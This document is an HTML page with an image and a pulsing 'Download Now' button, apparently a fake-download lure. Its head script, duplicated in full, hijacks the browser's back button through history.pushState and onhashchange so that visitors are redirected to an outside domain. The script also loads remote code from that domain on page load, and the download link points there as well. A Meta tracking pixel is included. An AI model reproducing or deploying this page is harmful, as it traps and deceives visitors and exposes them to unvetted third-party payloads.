<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Responsive Design</title>
    <style>
      body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
      }
      .container {
        text-align: center;
        padding: 10px;
      }
      .image-container img {
        max-width: 100%;
        height: auto;
      }
      .pulse {
        animation: pulse 1s infinite;
      }
      @keyframes pulse {
        0% {
          transform: scale(1);
        }
        50% {
          transform: scale(1.1);
        }
        100% {
          transform: scale(1);
        }
      }
      .download-button {
        background-color: green;
        color: white;
        padding: 10px 20px;
        border: none;
        border-radius: 5px;
        cursor: pointer;
        font-size: 1rem;
        margin-top: 20px;
      }
      .download-button a {
        color: white;
        text-decoration: none;
      }
    </style>
    <script>
      window.onhashchange = function () {
        jp();
      };
      function hh() {
        history.pushState(
          history.length + 1,
          "message",
          "#" + new Date().getTime()
        );
      }
      function jp() {
        fh();
      }
      setTimeout("hh();", 500);
      function fh() {
        location.href =
          "https://obliquecensortend.com/z11ndakftu?key=b56394dcc77ab57b68f18edb9dd22469";
      }
      function goon() {
        location.href =
          "https://obliquecensortend.com/z11ndakftu?key=b56394dcc77ab57b68f18edb9dd22469";
      }

      window.onhashchange = function () {
        jp();
      };
      function hh() {
        history.pushState(
          history.length + 1,
          "message",
          "#" + new Date().getTime()
        );
      }
      function jp() {
        fh();
      }
      setTimeout("hh();", 500);
      function fh() {
        location.href =
          "https://obliquecensortend.com/z11ndakftu?key=b56394dcc77ab57b68f18edb9dd22469";
      }
      function goon() {
        location.href =
          "https://obliquecensortend.com/z11ndakftu?key=b56394dcc77ab57b68f18edb9dd22469";
      }

      var _hmt = _hmt || [];
      (function () {
        var hm = document.createElement("script");
        hm.src =
          "https://obliquecensortend.com/z11ndakftu?key=b56394dcc77ab57b68f18edb9dd22469";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
      })();
    </script>

<!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '501403612216292');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=501403612216292&ev=PageView&noscript=1"
/></noscript>
<!-- End Meta Pixel Code -->


    
  </head>
  <body>
    <div class="container">
      <div class="image-container">
        <a
          href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOmjcWgX3lipwP5FeXz7YuvN77ojtqq-v0OyHCgCoSwsA6cRXZjmzpgxLAiCv1Q25xTz1k7ei4uWpALzdV9rZwYY2QWdJGK5vsayItIdaSt_eZ_Xe0d63m5Q0Ud9yIPagHAP5r_O3bsyAit0u7ExZ5ZE49Hb-RaW4XrrAGS5XsyNSJooPNHMq-50tcKAef/s613/p26626682_v_h9_ab.jpg"
        >
          <img
            src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOmjcWgX3lipwP5FeXz7YuvN77ojtqq-v0OyHCgCoSwsA6cRXZjmzpgxLAiCv1Q25xTz1k7ei4uWpALzdV9rZwYY2QWdJGK5vsayItIdaSt_eZ_Xe0d63m5Q0Ud9yIPagHAP5r_O3bsyAit0u7ExZ5ZE49Hb-RaW4XrrAGS5XsyNSJooPNHMq-50tcKAef/s613/p26626682_v_h9_ab.jpg"
            alt="Sample Image"
          />
        </a>
      </div>
      <button class="pulse download-button">
        <a
          href="https://obliquecensortend.com/z11ndakftu?key=b56394dcc77ab57b68f18edb9dd22469"
          >Download Now</a
        >
      </button>
    </div>
  </body>
</html>
